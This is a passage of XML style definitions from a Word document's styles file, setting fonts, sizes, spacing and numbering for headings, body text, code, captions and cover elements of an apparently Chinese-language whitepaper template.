      <w:jc w:val="center"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af">
    <w:name w:val="annotation subject"/>
    <w:basedOn w:val="a6"/>
    <w:next w:val="a6"/>
    <w:link w:val="Char9"/>
    <w:qFormat/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="af0">
    <w:name w:val="Table Grid"/>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unhideWhenUsed/>
    <w:qFormat/>
    <w:rPr>
      <w:color w:val="800080"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="af2">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="a0"/>
    <w:qFormat/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="af3">
    <w:name w:val="Hyperlink"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTML0">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="af4">
    <w:name w:val="annotation reference"/>
    <w:basedOn w:val="a0"/>
    <w:qFormat/>
    <w:rPr>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTML1">
    <w:name w:val="HTML Sample"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>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Cambria" w:eastAsia="宋体" w:hAnsi="Cambria" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="2"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="3Char">
    <w:name w:val="标题 3 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="3"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="2"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="4Char">
    <w:name w:val="标题 4 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="4"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="黑体" w:hAnsi="Arial" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="2"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="5Char">
    <w:name w:val="标题 5 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="5"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="2"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="6Char">
    <w:name w:val="标题 6 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="6"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="宋体" w:hAnsi="Cambria" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="2"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="7Char">
    <w:name w:val="标题 7 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="7"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="2"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="8Char">
    <w:name w:val="标题 8 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="8"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="宋体" w:hAnsi="Cambria" w:cs="Times New Roman"/>
      <w:kern w:val="2"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="9Char">
    <w:name w:val="标题 9 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="9"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="宋体" w:hAnsi="Cambria" w:cs="Times New Roman"/>
      <w:kern w:val="2"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char6">
    <w:name w:val="页眉 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="aa"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char5">
    <w:name w:val="页脚 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a9"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="8lab-1">
    <w:name w:val="8lab-1级标题"/>
    <w:basedOn w:val="-1"/>
    <w:link w:val="8lab-1Char"/>
    <w:qFormat/>
    <w:rsid w:val="00304677"/>
    <w:pPr>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="000000" w:themeColor="text1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="8lab-1Char">
    <w:name w:val="8lab-1级标题 Char"/>
    <w:basedOn w:val="1Char"/>
    <w:link w:val="8lab-1"/>
    <w:qFormat/>
    <w:rsid w:val="00304677"/>
    <w:rPr>
      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
      <w:b/>
      <w:bCs/>
      <w:snapToGrid w:val="0"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:spacing w:val="12"/>
      <w:kern w:val="44"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="8lab-2">
    <w:name w:val="8lab-2级标题"/>
    <w:basedOn w:val="-2"/>
    <w:link w:val="8lab-2Char"/>
    <w:qFormat/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:adjustRightInd/>
      <w:spacing w:line="400" w:lineRule="exact"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="000000" w:themeColor="text1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="8lab-2Char">
    <w:name w:val="8lab-2级标题 Char"/>
    <w:basedOn w:val="2Char"/>
    <w:link w:val="8lab-2"/>
    <w:qFormat/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
      <w:b/>
      <w:bCs/>
      <w:iCs/>
      <w:snapToGrid w:val="0"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:kern w:val="2"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="8lab-3">
    <w:name w:val="8lab-3级标题"/>
    <w:basedOn w:val="-3"/>
    <w:link w:val="8lab-3Char"/>
    <w:qFormat/>
    <w:rsid w:val="00304677"/>
    <w:pPr>
      <w:adjustRightInd/>
      <w:spacing w:line="400" w:lineRule="exact"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="000000" w:themeColor="text1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char8">
    <w:name w:val="标题 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="ae"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="宋体" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="8lab-3Char">
    <w:name w:val="8lab-3级标题 Char"/>
    <w:basedOn w:val="3Char"/>
    <w:link w:val="8lab-3"/>
    <w:qFormat/>
    <w:rsid w:val="00304677"/>
    <w:rPr>
      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:kern w:val="2"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="8lab-40">
    <w:name w:val="8lab-4级标题"/>
    <w:basedOn w:val="4"/>
    <w:link w:val="8lab-41"/>
    <w:qFormat/>
    <w:rsid w:val="00F35BFF"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="0"/>
      </w:numPr>
      <w:spacing w:before="0" w:afterLines="100" w:after="100" w:line="400" w:lineRule="exact"/>
      <w:ind w:firstLineChars="200" w:firstLine="200"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="30"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="8lab-41">
    <w:name w:val="8lab-4级标题 字符"/>
    <w:basedOn w:val="4Char"/>
    <w:link w:val="8lab-40"/>
    <w:qFormat/>
    <w:rsid w:val="00F35BFF"/>
    <w:rPr>
      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:kern w:val="2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="30"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="8lab-5">
    <w:name w:val="8lab-5级标题"/>
    <w:basedOn w:val="5"/>
    <w:link w:val="8lab-5Char"/>
    <w:qFormat/>
    <w:rsid w:val="00F35BFF"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
      <w:b w:val="0"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="30"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="8lab-5Char">
    <w:name w:val="8lab-5级标题 Char"/>
    <w:basedOn w:val="5Char"/>
    <w:link w:val="8lab-5"/>
    <w:qFormat/>
    <w:rsid w:val="00F35BFF"/>
    <w:rPr>
      <w:rFonts w:ascii="微软雅黑" w:eastAsia="宋体" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
      <w:b w:val="0"/>
      <w:bCs/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:kern w:val="2"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="30"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="-5-">
    <w:name w:val="白皮书-5-正文"/>
    <w:basedOn w:val="a"/>
    <w:qFormat/>
    <w:pPr>
      <w:adjustRightInd w:val="0"/>
      <w:snapToGrid w:val="0"/>
      <w:spacing w:after="280"/>
      <w:jc w:val="left"/>
      <w:textAlignment w:val="baseline"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
      <w:snapToGrid w:val="0"/>
      <w:color w:val="262626" w:themeColor="text1" w:themeTint="D9"/>
      <w:kern w:val="0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="-1">
    <w:name w:val="白皮书-1级标题"/>
    <w:basedOn w:val="-5-"/>
    <w:qFormat/>
    <w:pPr>
      <w:pageBreakBefore/>
      <w:numPr>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="320" w:after="320"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:spacing w:val="12"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="-2">
    <w:name w:val="白皮书-2级标题"/>
    <w:basedOn w:val="-5-"/>
    <w:qFormat/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="480" w:after="240"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:iCs/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="-3">
    <w:name w:val="白皮书-3级标题"/>
    <w:basedOn w:val="-5-"/>
    <w:qFormat/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="480" w:after="240"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:snapToGrid/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="-4">
    <w:name w:val="白皮书-4级标题"/>
    <w:basedOn w:val="-5-"/>
    <w:qFormat/>
    <w:pPr>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="-6-">
    <w:name w:val="白皮书-6-论点"/>
    <w:basedOn w:val="-5-"/>
    <w:qFormat/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="2"/>
      </w:numPr>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="-8-">
    <w:name w:val="白皮书-8-图例"/>
    <w:basedOn w:val="a"/>
    <w:qFormat/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="3"/>
      </w:numPr>
      <w:adjustRightInd w:val="0"/>
      <w:snapToGrid w:val="0"/>
      <w:spacing w:before="200" w:after="200"/>
      <w:jc w:val="center"/>
      <w:textAlignment w:val="baseline"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial"/>
      <w:snapToGrid w:val="0"/>
      <w:color w:val="91BDC9"/>
      <w:kern w:val="0"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="-A">
    <w:name w:val="白皮书-论点A"/>
    <w:basedOn w:val="a"/>
    <w:qFormat/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="780"/>
      </w:tabs>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:spacing w:after="40"/>
      <w:ind w:left="780" w:hanging="420"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
      <w:snapToGrid w:val="0"/>
      <w:kern w:val="0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Default">
    <w:name w:val="Default"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:adjustRightInd w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Source Han Sans CN Medium" w:eastAsia="Source Han Sans CN Medium" w:hAnsi="Times New Roman" w:cs="Source Han Sans CN Medium"/>
      <w:color w:val="000000"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>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f5">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:pPr>
      <w:widowControl/>
      <w:adjustRightInd w:val="0"/>
      <w:snapToGrid w:val="0"/>
      <w:spacing w:after="200"/>
      <w:ind w:firstLineChars="200" w:firstLine="420"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:eastAsia="微软雅黑" w:hAnsi="Tahoma" w:cstheme="minorBidi"/>
      <w:kern w:val="0"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Chara">
    <w:name w:val="Char"/>
    <w:basedOn w:val="a"/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char1">
    <w:name w:val="文档结构图 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a5"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char4">
    <w:name w:val="批注框文本 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a8"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char0">
    <w:name w:val="题注 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a4"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="黑体" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="apple-converted-space">
    <w:name w:val="apple-converted-space"/>
    <w:basedOn w:val="a0"/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HTMLChar">
    <w:name w:val="HTML 预设格式 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="HTML"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pln">
    <w:name w:val="pln"/>
    <w:basedOn w:val="a0"/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char2">
    <w:name w:val="批注文字 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a6"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="8lab-">
    <w:name w:val="8lab-表标题"/>
    <w:basedOn w:val="a4"/>
    <w:link w:val="8lab-Char"/>
    <w:qFormat/>
    <w:rsid w:val="00F35BFF"/>
    <w:pPr>
      <w:spacing w:line="480" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
      <w:sz w:val="15"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="8lab-Char">
    <w:name w:val="8lab-表标题 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="8lab-"/>
    <w:qFormat/>
    <w:rsid w:val="00F35BFF"/>
    <w:rPr>
      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
      <w:kern w:val="2"/>
      <w:sz w:val="15"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="8lab-0">
    <w:name w:val="8lab-正文"/>
    <w:basedOn w:val="-5-"/>
    <w:link w:val="8lab-Char0"/>
    <w:qFormat/>
    <w:rsid w:val="00304677"/>
    <w:rPr>
      <w:color w:val="000000" w:themeColor="text1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="8lab-Char0">
    <w:name w:val="8lab-正文 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="8lab-0"/>
    <w:qFormat/>
    <w:rsid w:val="00304677"/>
    <w:rPr>
      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
      <w:snapToGrid w:val="0"/>
      <w:color w:val="000000" w:themeColor="text1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="8lab-6">
    <w:name w:val="8lab-超链接"/>
    <w:basedOn w:val="8lab-0"/>
    <w:link w:val="8lab-Char1"/>
    <w:qFormat/>
    <w:rsid w:val="00F35BFF"/>
    <w:pPr>
      <w:ind w:firstLine="480"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="1C7DCE"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="8lab-Char1">
    <w:name w:val="8lab-超链接 Char"/>
    <w:basedOn w:val="8lab-Char0"/>
    <w:link w:val="8lab-6"/>
    <w:qFormat/>
    <w:rsid w:val="00F35BFF"/>
    <w:rPr>
      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
      <w:snapToGrid w:val="0"/>
      <w:color w:val="1C7DCE"/>
      <w:kern w:val="2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="8lab-7">
    <w:name w:val="8lab-代码"/>
    <w:basedOn w:val="8lab-0"/>
    <w:link w:val="8lab-Char2"/>
    <w:qFormat/>
    <w:rsid w:val="00457B5F"/>
    <w:pPr>
      <w:spacing w:after="0"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="8lab-Char2">
    <w:name w:val="8lab-代码 Char"/>
    <w:basedOn w:val="8lab-Char0"/>
    <w:link w:val="8lab-7"/>
    <w:qFormat/>
    <w:rsid w:val="00457B5F"/>
    <w:rPr>
      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
      <w:snapToGrid w:val="0"/>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
      <w:kern w:val="2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="8lab-8">
    <w:name w:val="8lab-封面信息"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="8lab-Char3"/>
    <w:qFormat/>
    <w:rsid w:val="00F35BFF"/>
    <w:pPr>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="8lab-Char3">
    <w:name w:val="8lab-封面信息 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="8lab-8"/>
    <w:qFormat/>
    <w:rsid w:val="00F35BFF"/>
    <w:rPr>
      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
      <w:kern w:val="2"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="8lab-9">
    <w:name w:val="8lab-列举"/>
    <w:basedOn w:val="8lab-0"/>
    <w:qFormat/>
    <w:rsid w:val="00F35BFF"/>
    <w:pPr>
      <w:spacing w:afterLines="50" w:after="50"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="8lab-a">
    <w:name w:val="8lab-目录标题"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="8lab-Char4"/>
    <w:qFormat/>
    <w:rsid w:val="00F35BFF"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="0"/>
      </w:numPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
      <w:b w:val="0"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w:lang w:val="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="8lab-Char4">
    <w:name w:val="8lab-目录标题 Char"/>
    <w:basedOn w:val="1Char"/>
    <w:link w:val="8lab-a"/>
    <w:qFormat/>
    <w:rsid w:val="00F35BFF"/>
    <w:rPr>
      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
      <w:b w:val="0"/>
      <w:bCs/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:kern w:val="44"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w:lang w:val="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="8lab-b">
    <w:name w:val="8lab-图标题"/>
    <w:basedOn w:val="a4"/>
    <w:link w:val="8lab-Char5"/>
    <w:qFormat/>
    <w:rsid w:val="00457B5F"/>
    <w:pPr>
      <w:snapToGrid w:val="0"/>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
      <w:b/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="15"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char9">
    <w:name w:val="批注主题 Char"/>
    <w:basedOn w:val="Char2"/>
